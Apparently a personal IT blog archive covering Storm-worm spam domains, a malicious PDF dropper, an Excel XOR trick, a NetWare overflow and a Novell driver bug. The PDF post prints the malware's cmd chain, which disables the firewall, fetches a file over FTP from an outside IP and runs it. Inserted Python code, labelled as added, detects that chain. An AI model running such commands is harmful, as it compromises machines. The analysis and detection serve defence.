Archive for the ‘English’ Category

The first Matchbox experiences…

Sunday, January 13th, 2008

Who’s gonna be the next contestant in the crash-test?

Ah, we have it…

“About an hour and a half ago – we’ve had no explanation – police estimate some three to four hundred people – they just, they just got out and walked. God! We’ve gotten confirmation we cannot find anyone…
I’ve never seen anything like this…”
[REM – Everybody Hurts – Lyrics]

(dedicated to Sam.Joe)

Merry Christmas – Not…

Wednesday, December 26th, 2007

Guess what’s happening on Christmas?

E-mails start to flow wishing merry Christmas with links to uhavepostcard (dot com) and merrychristmasdude (dot com). One gets suspicious. And it turns out, one is right – again. Do not visit the above links unless you are keen on getting some new trojans…

After adjusting our server’s spam filter, I do some more research. Some antivirus products recognise the downloadable file, some do not.

The domains were registered on the 23rd of December, and the registration data are obviously fake (ZIP 12345, yahoo and hotmail e-mail accounts, etc.).
The problem with this domain based spamvertizing is that – unlike the IP based kind – the domain can exist and be maintained for a longer period of time, and its nameserver records can be changed; currently they consist of 2*13 entries from different countries and different ISPs.
The IP address of the “webserver” is served by these “bot-NS” servers, from a pool of thousands of other bots, so it is easy to see that stopping these is impossible.

So, then one writes to the domain registrar – responsible for registering the domains in question – to null out the nameservers and put the domain on hold (render the domain useless and not let it be registered elsewhere). The registrar happens to be Russian (RU-CENTER), which doesn’t look good at first sight.

However, some answer comes back, the essence of which is that I should report to ICANN/Internic if the domain has invalid registration data. Then after ICANN notifies them, they try to contact the owner, and if no answer comes back in 2 weeks(!), they switch off the domain.

Those who understand even a tiny bit of what this is about now say “ridiculous”. Two weeks from now, when the trojan has been downloaded a million times, no one will care whether the above domains exist or not.

I’ve tried once more to explain that if we can’t kill it at the domain registration level, there is no chance of doing anything else, like digging up thousands of bots’ IPs and reporting them one by one (while newer ones join in the meantime).
The last reply I got is currently this:

“We have initiated the check of the Whois information according to advised ICANN procedure. If it is really fail we will remove domain names.”

I’m really curious when will anything happen to these damned domains.

Update:
Dec 26, 18:04 [UTC +01:00] – New spamvertized malware hosting domain: HAPPYCARDS2008[.COM] – similar fake details, new registration, etc. Another urging message to the Russians. A slogan popped up into my mind, from an early MTV environmental advertisement. “If you’re not part of the solution, you’re part of the problem…”

Dec 26, 20:33 [UTC +01:00] – I didn’t get any answer from RU-CENTER, nor do I see the domains disappearing. So I encourage anyone who cares a little bit to contact (“bomb”) RU-CENTER at the “tld-ncc [@] nic.ru” address regarding this matter. Other forms of contact can be seen here: http://www.nic.ru/about/en/contact_ncc.html
I’m amazed how many people wrote blog entries on this issue, yet none seemed to contact the only place which can do anything, the “tree root”. Come on people, you can do better. Or do I have to save the world (again) single-handedly? :-]

Dec 27, 10:15 [UTC +01:00]
1st newyearcards2008[.com] spams – RU-Center urged to act again. Seems like if you want to spam, you should choose them to register your domain…

Dec 28, 16:51 [UTC +01:00]
new domain: newyearwithlove.com – reported at ICANN/Internic

Jan 05, 15:39 [UTC +01:00]
As you might have guessed, I got tired of reporting to an unresponsive registrar, Internic and sirt.
There is not much I can do, and many others have started to complain and comment on this issue.
Such as – but not limited to:
http://www.castlecops.com/p1038986-storm_worm_spam.html#1038986
Where – among others – you can see my “open letter to RU-CENTER”.
That was addressed on the 28th of December to ru-ncc@nic.ru, tld-ncc@nic.ru, tld-adm@nic.ru, tld-tech@nic.ru and info@cert.ru
Since they didn’t bother to do anything or at least answer, the most I can do is to list their addresses here and hope that e-mail address harvester bots will “get the message” and eventually make them feel the same way as many of us.

Spamhaus complaint listed at: http://www.spamhaus.org/news.lasso?article=624

List of all domains registered relating to this fast-flux storm-bot Christmas/New Year “event”:
http://www.spamtrackers.eu/wiki/index.php?title=Storm#December_29

Jan 09, 15:53 [UTC +01:00]
Just received a mail from RU-CENTER:

Dear Sirs,

The domains:

HAPPYCARDS2008.COM
NEWYEARWITHLOVE.COM
UHAVEPOSTCARD.COM
MERRYCHRISTMASDUDE.COM

are put on hold,

—
Best Regards,

Julia A. Lotkova
Regional Network Information Center (RU-CENTER)
Phone:  +7 495 737-0601
fax:    +7 495 737-0602
http://www.nic.ru

I checked all known domains; they show “NOT-DELEGATED” and it seems they don’t work anymore.
And it only took like 16 days!!!
Let’s be happy folks – and prepare for the new domains which will be registered soon…

Jan 10, 11:51 [UTC +01:00]
From: “RU-CENTER NCC”
Sent: Thursday, January 10, 2008 11:51 AM
Subject: [ru-center #1781157] Re: open letter to RU-CENTER

Dear Sirs,

The domains are put on hold, thank you for your report.
New alike registrations are monitored.

—
Best Regards,

Julia A. Lotkova
Regional Network Information Center (RU-CENTER)
Phone: +7 495 737-0601
fax: +7 495 737-0602
http://www.nic.ru

so let’s hope that at least new domains won’t be registered here.

Explanation of the previous PDF exploit – details on the PDF containing the exploit

Tuesday, October 30th, 2007

This is how the exploit in the recently received PDF file looks:

../../../windows/system32/cmd".exe"" /c " cmd
/c = execution of commands, between quotes, separated by “&”s, e.g.: “command1 & command2 & … & commandN”

set
cls

netsh firewall set opmode mode=disable
(Disable the firewall)

echo o 81.95.146.181 >i
echo binary >>i
echo get /system.com >>i
echo quit >>i
(Creation of the FTP script “i”, which opens 81.95.146.181, switches to binary mode, downloads system.com, then quits)

ftp -s:i -v -A >nul
(Execution of the FTP script. -v = don’t display remote replies, -A = use the anonymous account)

del /q i
(Delete the script)

start system.com
(Execution of the downloaded “system.com”)

BTW, I wasn’t able to download or even connect to the above IP. It might be overloaded or have been kicked off.
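A detection sketch for the dropper chain walked through above, as an added example that is not the post’s own code: it runs over a constructed process-creation log (made-up pids, a documentation-range IP in place of the real one) and reports the top-most process whose tree combines the quoted cmd path, the firewall shutdown, the echo-built FTP script, the scripted ftp run and the start of the downloaded file, while a lone scripted ftp job stays unflagged. The log format, the pids and all function names are this example’s assumptions.

```python
import re
from collections import defaultdict

# Constructed sample process-creation log (not from the original post): pids, the
# PDF name and the 192.0.2.10 documentation-range IP are made up. Assumed format:
# "<time> pid=<n> ppid=<n> cmd=<command line>"
SAMPLE_LOG = """\
09:14:02 pid=1188 ppid=904 cmd=AcroRd32.exe C:\\docs\\card.pdf
09:14:05 pid=1304 ppid=1188 cmd=../../../windows/system32/cmd".exe"" /c " cmd /c set & cls & netsh firewall set opmode mode=disable & echo o 192.0.2.10 >i & echo binary >>i & echo get /system.com >>i & echo quit >>i & ftp -s:i -v -A >nul & del /q i & start system.com"
09:14:06 pid=1312 ppid=1304 cmd=netsh firewall set opmode mode=disable
09:14:07 pid=1320 ppid=1304 cmd=ftp -s:i -v -A
09:14:09 pid=1330 ppid=1304 cmd=system.com
09:20:11 pid=1400 ppid=600 cmd=ftp -s:nightly.txt backup.example.internal
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) pid=(?P<pid>\d+) ppid=(?P<ppid>\d+) cmd=(?P<cmd>.*)$")

# One regex per stage of the chain the post walks through.
INDICATORS = {
    "quoted_cmd_path": re.compile(r'cmd"\.exe"', re.I),     # the cmd".exe"" path in the PDF
    "firewall_off": re.compile(r"netsh\s+firewall\s+set\s+opmode\s+mode=disable", re.I),
    "ftp_script_build": re.compile(r"echo\s+get\s+\S+\s*>>?\s*\S+", re.I),  # echo get ... >>i
    "ftp_scripted": re.compile(r"\bftp(\.exe)?\b[^&]*\s-s:\S+", re.I),      # ftp -s:<script>
    "start_dropped": re.compile(r"\bstart\s+\S+\.(com|exe|scr|bat)\b", re.I),
}

def parse_log(text):
    """Return {pid: (ppid, command line)} for every well-formed line."""
    procs = {}
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            procs[int(m["pid"])] = (int(m["ppid"]), m["cmd"])
    return procs

def indicators_for(cmd):
    return {name for name, rx in INDICATORS.items() if rx.search(cmd)}

def score_trees(procs, min_hits=3):
    """Collect indicators over each process and its descendants and report the
    top-most process whose subtree reaches min_hits distinct stages."""
    hits = {pid: indicators_for(cmd) for pid, (_, cmd) in procs.items()}
    children = defaultdict(list)
    for pid, (ppid, _) in procs.items():
        children[ppid].append(pid)

    def subtree(pid):
        found = set(hits[pid])
        for child in children[pid]:
            found |= subtree(child)
        return found

    def qualifies(pid):
        return len(subtree(pid)) >= min_hits

    alerts = {}
    for pid, (ppid, cmd) in procs.items():
        if qualifies(pid) and not (ppid in procs and qualifies(ppid)):
            alerts[pid] = {"cmd": cmd, "indicators": sorted(subtree(pid))}
    return alerts

if __name__ == "__main__":
    for pid, alert in score_trees(parse_log(SAMPLE_LOG)).items():
        print(f"pid {pid}: {alert['cmd'][:40]}... -> {', '.join(alert['indicators'])}")
```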

Food for thought…

Wednesday, October 24th, 2007

Vegetable basket – Greenpieces

The Eggs – Hello from the Ham and Eggs family

Ubi forti – cucumbersome

Excel reloaded

Sunday, October 14th, 2007

And now, here is the Excel (OpenOffice) XOR implementation. Since I couldn’t find a similar description on the internet, I detail it in English (too), so that other continents can enjoy it as well…

Once upon a time, I wanted to do some basic XOR-ing in Excel. Then I realized that there is no such thing as XOR there. So I “developed” one, and even though this is pretty simple to do, Google doesn’t seem to turn up such a solution, so I publish it here and now.

Since XOR is basically similar to addition – adding or XOR-ing the (binary) digit pairs 0 and 1, 1 and 0, and 0 and 0 gives the same result – we only have to “do something” when two “1”-s have to be dealt with, as 1+1=2 but 1 xor 1=0.
Unfortunately, to convert to binary we need to enable the Analysis ToolPak in Tools/Add-ins (in Hungarian: Eszközök/Bővítménykezelő) to allow the use of DEC2BIN (and HEX2BIN, whichever you want); then it is easy as pie.

Let’s see 15 XOR 6
15 (decimal) will become “1111” after a DEC2BIN(15) and 6 will become 110. Adding the converted numbers as decimals will result in 1221. Then a SUBSTITUTE of the “2”-s with “0”-s gives 1001, so after a BIN2DEC you will get the result: 9.
(Doing “OR” instead of “XOR” would need a replacement of the “2”-s with “1”-s)

The xxx2yyy conversion functions have a limit of 0-511, so if your number is above that, deal with it first.

So, if A1 and B1 contains the two (decimal) numbers to be xored, then C1 would be:
=SUBSTITUTE(DEC2BIN(A1)+DEC2BIN(B1),2,0)

In Hungarian: if A1 and B1 contain the two (decimal) numbers to be XORed, then C1 is:
=HELYETTE(DEC2BIN(A1)+DEC2BIN(B1);2;0)
(for English Excel or OpenOffice, use the formula given in the English part)
To use the xxx2xxx functions we have to enable the Analysis ToolPak add-in under Eszközök/Bővítménykezelő (Tools/Add-ins); these functions (only) work in the range 0 to 511.

We get the result in binary, which we can convert with BIN2DEC or BIN2HEX (can also use HEX2BIN instead of DEC2BIN if we want to xor hex numbers right away)
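The spreadsheet trick simulated in Python, as an added example that is not part of the original post: it reproduces DEC2BIN, the decimal “+” on the two bit strings, SUBSTITUTE and BIN2DEC step by step, checks the result against a real XOR over the 0..511 range, and goes beyond the post with an AND variant (keep only the 2s) and a chunked XOR for numbers above 511; trace_xor, spreadsheet_xor and the other names are this example’s own.

```python
def dec2bin(n):
    """Mimic DEC2BIN for the 0..511 range the post uses (the add-in also takes
    negatives as 10-bit two's complement, which this sketch does not model)."""
    if not 0 <= n <= 511:
        raise ValueError("outside the 0..511 range; split the number first")
    return format(n, "b")

def add_as_decimal(a_bin, b_bin):
    """The spreadsheet '+' coerces both bit strings to decimal numbers and adds them.
    Every column is at most 1+1=2, so a carry never occurs: 1111 + 110 = 1221."""
    return str(int(a_bin) + int(b_bin))

def trace_xor(a, b):
    """Return every intermediate value of the post's formula, e.g. for 15 XOR 6."""
    a_bin, b_bin = dec2bin(a), dec2bin(b)
    summed = add_as_decimal(a_bin, b_bin)
    xored = summed.replace("2", "0")                    # SUBSTITUTE(...;2;0)
    return a_bin, b_bin, summed, xored, int(xored, 2)   # BIN2DEC

def spreadsheet_xor(a, b):
    return trace_xor(a, b)[4]

def spreadsheet_or(a, b):
    """OR: a column holding a 2 (both bits set) also yields 1, so SUBSTITUTE 2 -> 1."""
    return int(add_as_decimal(dec2bin(a), dec2bin(b)).replace("2", "1"), 2)

def spreadsheet_and(a, b):
    """AND (not in the post): only the 2 columns survive, so 1 -> 0 and then 2 -> 1."""
    summed = add_as_decimal(dec2bin(a), dec2bin(b))
    return int(summed.replace("1", "0").replace("2", "1"), 2)

def spreadsheet_xor_wide(a, b):
    """Beyond 511 (not in the post): XOR 9-bit chunks separately and reassemble."""
    result, shift = 0, 0
    while a or b:
        result |= spreadsheet_xor(a & 511, b & 511) << shift
        a, b, shift = a >> 9, b >> 9, shift + 9
    return result

def verify(limit=512):
    """Exhaustively compare the spreadsheet versions with Python's own operators."""
    return all(spreadsheet_xor(a, b) == a ^ b
               and spreadsheet_or(a, b) == a | b
               and spreadsheet_and(a, b) == a & b
               for a in range(limit) for b in range(limit))

if __name__ == "__main__":
    print(trace_xor(15, 6))   # ('1111', '110', '1221', '1001', 9)
    print(verify())
```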

Other ideas welcome

mystery solved: NetWare 3.x/4.x remirror starting at 88%

Tuesday, July 17th, 2007

Finally I took some minutes and checked that cosmetic issue whose symptom is an 88% remirror status shown right after the start of a remirroring (where it should be 0%) on earlier NetWares.

If install.nlm shows 42.949.680 or more data blocks (that is 171.798.720 sectors, approximately 163,84 GB) for a partition, then the mirror algorithm fails to correctly calculate the percentage.

Let’s say we have 48.832.973 (0x2E921CD) data blocks, with 6627 (0x19E3) redirection blocks.
Then according to server.exe’s calculation, ~48.408.845 (~0x2E2A90D) “mirror blocks” should be mirrored.
There is an instruction “IMUL EBX*64h” which multiplies this value by 100 (0x64), but the result overflows the poor 32-bit register: the full value would be 0x1208A0914.
Dividing only the remaining 32-bit part (0x208A0914) by the number of data blocks (0x2E921CD) results in 11 (0xB), which is displayed as 99-11=88% complete.
So from then on it reaches 99% at about the 0xA699D-th mirrored block, then at the next block it “jumps” to 12% (0xffffe10/0x2E921CD=0x57=87 -> 99-87=12%).
Then it goes on to 99% “normally”.

This only affects the calculation and display of the status percentage, not the mirroring procedure itself.
So even 3.x/4.x NetWares – more precisely the NetWare traditional file system – can handle large hard disks/block sizes, but it seems whoever wrote the “display percentage calculation” part wasn’t prepared enough…
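The overflow reproduced in Python, as an added example that is not part of the original post: it follows the post’s description of the calculation (product of the remaining mirror blocks and 100 kept in 32 bits, divided by the data block count, shown as 99 minus the quotient), which is a reconstruction from the text above rather than the real server.exe code, and shows the 88% start and the 99% to 12% jump beside the value a wide intermediate would give. The function names and the sample points are this example’s own.

```python
MASK32 = 0xFFFFFFFF
DATA_BLOCKS = 0x2E921CD     # 48.832.973 data blocks, from the post
MIRROR_BLOCKS = 0x2E2A90D   # ~48.408.845 blocks still to be mirrored at the start

def percent_done_buggy(remaining, total):
    """The post's model of server.exe: IMUL by 100 (0x64) keeps only the low 32 bits,
    the truncated product is divided by the data block count and the quotient is
    subtracted from 99 (reconstructed from the description, not from disassembly)."""
    product = (remaining * 100) & MASK32
    return 99 - product // total

def percent_done_fixed(remaining, total):
    """Same arithmetic with an unbounded intermediate (a 64-bit product in real code)."""
    return 99 - (remaining * 100) // total

def overflow_threshold():
    """Smallest block count whose product with 100 no longer fits in 32 bits
    (42.949.673; the post quotes 42.949.680 as the threshold)."""
    return (1 << 32) // 100 + 1

def wraparound_point(start_remaining):
    """Blocks mirrored when the product first fits in 32 bits again, i.e. where the
    display drops from the false 99% to the value the remaining work really gives."""
    return start_remaining - (1 << 32) // 100

def progress_samples(total, start_remaining):
    """(blocks done, shown %, correct %) at the start, around the wraparound, and at the end."""
    jump = wraparound_point(start_remaining)
    points = [0, jump - 1, jump, start_remaining]   # blocks mirrored so far
    return [(done,
             percent_done_buggy(start_remaining - done, total),
             percent_done_fixed(start_remaining - done, total)) for done in points]

if __name__ == "__main__":
    for done, buggy, fixed in progress_samples(DATA_BLOCKS, MIRROR_BLOCKS):
        print(f"after {done:>10} blocks: shown {buggy:>2}%  correct {fixed:>2}%")
```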

Traditional file system’s “most important” size related limitations:
Maximum device size recognized (physical or logical): 2 TB
Maximum partition size: 1 TB
Maximum volume size: 1 TB
Maximum file size: 4 GB

Here is a more detailed comparison of the traditional FS versus NSS.

Fault tolerance – reloaded

Friday, July 13th, 2007

Minimum requirements for RAID-5 – or RAID-1 with hot spare.

Uptime: 610 days…

Fault tolerance

Saturday, June 23rd, 2007

It is never too early to be fault tolerant!

“Pacifier (North American English), dummy (British, New Zealand, and Australian English) or soother (Canadian and Irish English), is a rubber, plastic or silicone nipple given to an infant or other young child to suck upon” – hereinafter referred to as the “object”.

As we can see, my son is fault tolerant: he has a “hot spare” object in his hand, in case of any fault of the object currently in use.

By exchanging the objects from time to time (striping), load balancing can be achieved, thus the objects’ lifetime will be doubled (MTTF/MTBF).

Mirrored objects are all synchronized.

——————————————————————-

It is never too early to use a fault-tolerant system.

My son is equipped with a fault-tolerant pacifier system: the “available unit” can at any time replace the currently used unit should it fail. By swapping the units from time to time, load sharing is achieved and, as a consequence, a longer lifetime for the units.

VBS – VS_FIXEDFILEINFO

Tuesday, May 29th, 2007

To make it short, I was writing a part of a login script in VBS which collects some version information on some “critical” software, and I was a bit surprised when I saw that “getfileversion” returns 0.0.0.0 for Cisco Systems VPN Client files (such as ipsecdialer.exe). In this case this happens because the data part of its VS_FIXEDFILEINFO is not filled out properly (or at all), …

… thus you can only rely on the “text based” stringfileinfo’s productfile information.

I was looking for several hours to find a method to obtain those parts with some simple commands or a script, but all I could find referred to Visual Basic (not VBScript) or C.
“When I was young”, I wrote an assembly program (version.com on this page) to read data from VS_FIXEDFILEINFO, so I knew that implementing it from scratch would take some time, so I searched on…

Then I found an excellent site with excellent scripts, such what I needed: http://www.jsware.net/jsware/scripts.php3#fvinfo

Even more, I found some “comments” which I couldn’t even find on Microsoft’s site:
Normally there is no VBScript method to return the information that shows when a file is right-clicked, then “Properties” is clicked, and the “Version” tab is selected.
I mean: Come on, Microsoft!?! Sometimes documenting that something cannot be done is better than nothing; at least I wouldn’t have tried to look for an “all-in-one” VBS command for it.

The script is neatly written and does the job. However, after some consideration, I decided not to put another 16K into the login script (tripling its size) just to read one screwed-up application’s version number. I will just rely on the “DisplayName” value of the relevant uninstall key in the registry; it is currently “Cisco Systems VPN Client 4.8.00.0440” on my system, so extracting the version number out of it will do the job.

Anyway, hats off to JSWare for creating and publishing such a brilliant code sample for obtaining version info from the VS_FIXEDFILEINFO resource.

Nprinter history and comment page

Friday, May 11th, 2007

This page is to let people know what happened (and what didn’t) in connection with the problem that shows up when using Nprinter (for NT) on XP with Novell Client 32 (e.g. blue screen – DRIVER_IRQL_NOT_LESS_OR_EQUAL).
Here you can also express your comments regarding this issue.
Since the current status of this issue at Novell is “Closed” (unresolved), please do leave your comment here, to raise the chance of this issue being fixed.

In “short” (but really…):

  • I created “my” webpage on Nprinter on 2004.JUN.07. That was roughly a year or more after I first needed to have nprinter on Windows 2000 and XP. Later on I started experiencing this issue on XP machines…
  • Time passed, I got mails and I also experienced the problem at other customers too.
  • I experienced the problem at a customer where finally we had to buy some print servers to solve it, so I got “pissed off”, and then reported “NWClient 491SP2+PKA – nwsipx32.sys – DRIVER_IRQL_NOT_LESS_OR_EQUAL” to Novell’s patchfeedback address on Wednesday, May 24, 2006 11:44 AM (with screenshots and other details)
  • The same day I got an answer from Earle Wells, congratulating me on how I detailed the problem and saying that I should use NDPS.
  • After several more letters on the same day, I “achieved” that we reached: “Good news! Engineering is willing to take a look at a kernel memory dump”
  • I sent the dump; the next day he informed me that they had found the bug, but that it would be too problematic to fix and would probably never be fixed. An internal TID was also created, and the service request ticket was closed.
  • I got several more letters from other “nprinter fans” and on 2006 August 17 I contacted my Novell “internal” / “problem-solver” friend to check if there was anything more we could do. The next day he wrote back that it is in the “wontfix” category, and that he could talk about it in more detail for hours…
  • So I called him. As far as I remember, he explained that it is not even clear that this is an nwsipx32 bug (as sometimes it happens in tdi.sys, which is part of XP), and that it is low priority and obsolete and so on (which I had already known/suspected).
    I also tried to ask what the cost of fixing this would be, but it is not a matter of money. I also got the internal mailing on this, saying:
       > The particular point at which the NULL pointer is being
       > dereferenced is within a Microsoft-supplied TDI compile-
       > time macro, and between the complexity of it & the fact that
       > this is release code with full optimization, its going to take a
       > couple hours of de-compiling the previous instructions to
       > root out what exactly was being referenced that was NULL.
       > After that of course comes “why”.
       > So it’s not something that is a slam-dunk or quickly
       > actionable, which doesn’t bode well for an NWSIPX32
       > issue being observed primarily
  • So the same day (2006.AUG.18) I contacted another friend of mine – who is my partner’s brother and works for Microsoft in Seattle – asking whether there is any bug report on TDI.SYS [based on: http://support.microsoft.com/kb/829120/en-us] or a patch/beta release of the file.
  • The next day I got a negative answer and also a suggestion that I should contact MS support starting from “support.microsoft.com”.
  • I answered that I don’t “believe” a no-name guy opening an incident via web support would have any result, and even if it did, where to start at all…
  • Two days later (AUG.21) he mailed that he didn’t really know where to start either (via OEM, VAP, Technet or whatever other channel) and that he would ask around.
  • On the 22nd, another friend of mine called me. I didn’t have any news on what he was doing lately, but it turned out that he is the Director of Support at Microsoft Hungary.
  • He guided me on which link I should use so that they could give the green light on this problem, and he called me after he “saw” the incident getting started in their system. Then an hour later a support guy called me; I said I didn’t have much more information, but I made the dumps available for them to download.
  • We agreed that they should look only into the dumps where the BSOD happens in TDI.SYS (and not in NWSIPX32.SYS), as the issue shows up sometimes in TDI.SYS, sometimes in NWSIPX32.SYS.
  • On the 23rd I got a call from MS Hungarian tech support that they needed to escalate the problem to a higher level, to debug the dump more thoroughly, and also because this really seems to be a “bug”, not a “support incident”. [id: SRQ060822600811]
  • On the 24th, I got a call saying the dump analysis had been done, and the BSOD is Novell’s fault. I asked for more (written) technical data, then later I got a forwarded mail with not too much technical information either, mainly saying: “… basically the problem is caused by a novell driver that is not compatible to windows xp.”
  • Then I replied that I would really need more technical info to be able to “bounce back” the problem to Novell.
  • Finally I got a WinDbg analysis with some comments.
    The most important was:
    “f88a9dac 805ce794 f8b79298 00000000 00000000 nwsipx32+0x4d3a <--- Here we see the 3rd party driver loaded - but as we do not have the source code / symbols we cannot see the arguments passing up”
  • Then I realized I could also do a WinDbg analysis, so I downloaded and installed WinDbg and some other required tools. I “analyzed” the rest of my dumps and created a very detailed analysis and comparison of the different dumps.
  • On the 28th, I forwarded my results to my friend at Novell Hungary.
  • On Sep. 1 MS contacted me to ask if they could close the incident.
  • I asked my friend at Novell where we stood. He said his guy was on vacation, so I should hold on.
  • Time passed, then on Oct 11 I got information from Novell that they had assigned a priority to the bug. Even if very low, anything is higher than “wontfix”…
  • On FEB 23, 2007, I got a mail that says the bug is planned to be fixed in 4.91SP5.
    Though I don’t have permission to bugzilla, the link is here, and its main content is:
       What               | Removed | Added
       Fixed in Milestone | —       | 4.91 SP5
  • At the beginning of May I was informed that the status of this “issue” is “closed”. Not a “wontfix”, but basically closed without a solution.
  • It was also suggested that everyone having this problem should contact Novell and open an incident…

Since I believe it would be hard to convince people to do so, I tried to support my already opened incident with the dozens of mails I received relating to this issue, and I would still like your comment and some data (number of computers affected, maybe company name). The e-mail field at the comment will not be published, so feel free to use your valid address if you would like to be notified of any advancement.